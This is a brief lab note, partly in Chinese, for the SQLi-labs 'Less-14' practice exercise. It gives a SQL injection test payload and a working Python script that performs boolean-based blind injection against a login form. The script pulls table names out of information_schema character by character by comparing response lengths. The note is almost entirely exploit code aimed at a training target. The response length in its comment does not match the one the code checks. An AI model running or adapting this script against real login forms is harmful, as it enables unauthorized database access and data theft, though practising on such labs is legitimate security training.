less-14

测试语句

admin"  and 1=1#

# right 1493
# error 1454
import requests
import time
id='"'
url="https://sql.alienwares.top/Less-14/"
for i in range(1,100):
    for e in range(ord("a"), ord("z") + 1):
        parm={"uname":'admin" and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),+'+str(i)+",1))='"+chr(e)+"' #", "passwd":"admin" ,"submit":"Submit"}
        try:
            res=requests.post(url,parm)
        except requests.exceptions.ConnectionError:
            time.sleep(2)
            res=requests.post(url,parm)
        if(len(res.content)==1494):
            print(chr(e),end="")
            break